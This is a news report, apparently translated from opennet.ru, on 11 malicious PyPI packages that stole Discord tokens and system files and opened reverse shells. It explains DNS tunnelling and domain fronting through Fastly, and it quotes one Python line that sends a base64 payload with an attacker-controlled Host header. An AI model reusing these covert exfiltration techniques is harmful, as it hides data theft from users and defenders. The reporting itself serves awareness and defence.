The PyPI (Python Package Index) catalog revealed 11 packages that included malicious code. Before the problems were identified, the packages managed to download about 38 thousand times in total. The detected malicious packages are notable for the use of intricate ways to hide communication channels with the attackers' servers.
- importantpackage (6305 downloads), important-package (12897) - established a connection to an external server under the guise of connecting to pypi.python.org to provide shell access to the system (reverse shell) and used the trevorc2 program to hide the communication channel.
- pptest (10001), ipboards (946) - used DNS as a communication channel to transfer information about the system (in the first packet, the hostname, working directory, internal and external IP, in the second - username and hostname).
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) detected the Discord service token in the system and sent it to an external host.
- trrfab (287) - sends the identifier, hostname and contents of /etc/passwd, /etc/hosts, /home to an external host.
- 10Cent10 (490) - established a reverse shell connection with an external host.
- yandex-yt (4183) - displayed a message about the system being compromised and redirected to a page with additional information about further actions issued via nda.ya.ru (api.ya.cc).
Of particular note is the method of accessing external hosts used in the importantpackage and important-package packages, which used the Fastly content delivery network used in the PyPI catalog to hide their activity. In fact, requests were sent to the pypi.python.org server (including specifying the name python.org in SNI inside the HTTPS request), but at the same time, the name of the server controlled by the attackers was set in the HTTP header "Host" (sec.forward.io. global.prod.fastly.net). The content delivery network sent a similar request to the attacker's server using the TLS connection parameters with pypi.python.org when transmitting data.
The PyPI infrastructure is powered by the Fastly content delivery network, which uses a transparent Varnish proxy to cache typical requests, and uses TLS certificate processing at the CDN level, rather than end servers, to organize the forwarding of HTTPS requests through a proxy. Regardless of the target host, requests are sent to the proxy, which determines the desired host by the βHostβ HTTP header, and the domain names of the hosts are tied to the typical IP addresses of CDN load balancers for all Fastly clients.
The attacker's server also registers with CDN Fastly, which provides free data plans to everyone and even allows anonymous registration. It is noteworthy that when creating a βreverse shellβ, a scheme is also used to send requests to the victim, but initiated by the host of the attackers. From the outside, interaction with the attacker's server looks like a legitimate session with the PyPI directory, encrypted using the PyPI TLS certificate. A similar technique, known as "domain fronting", was previously actively used to hide the host name when bypassing locks, using the ability provided in some CDN networks to access HTTPS with a fictitious host specified in SNI and the actual transmission of the name of the requested host in the Host HTTP header within a TLS session.
To hide malicious activity, the TrevorC2 package was additionally used, which made interaction with the server similar to normal web navigation, for example, malicious requests were sent under the guise of downloading an image βhttps://pypi.python.org/images/guid=β with encoding information in the guid parameter. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
The pptest and ipboards packages used a different approach to hide network activity based on encoding payload information in queries to the DNS server. Malicious software transmits information by performing DNS requests of the form "nu4timjagq4fimbuhe.example.com", in which the data transmitted to the command and control server is encoded in the subdomain name using the base64 format. The attacker receives these messages by controlling the DNS server for the example.com domain.
Source: opennet.ru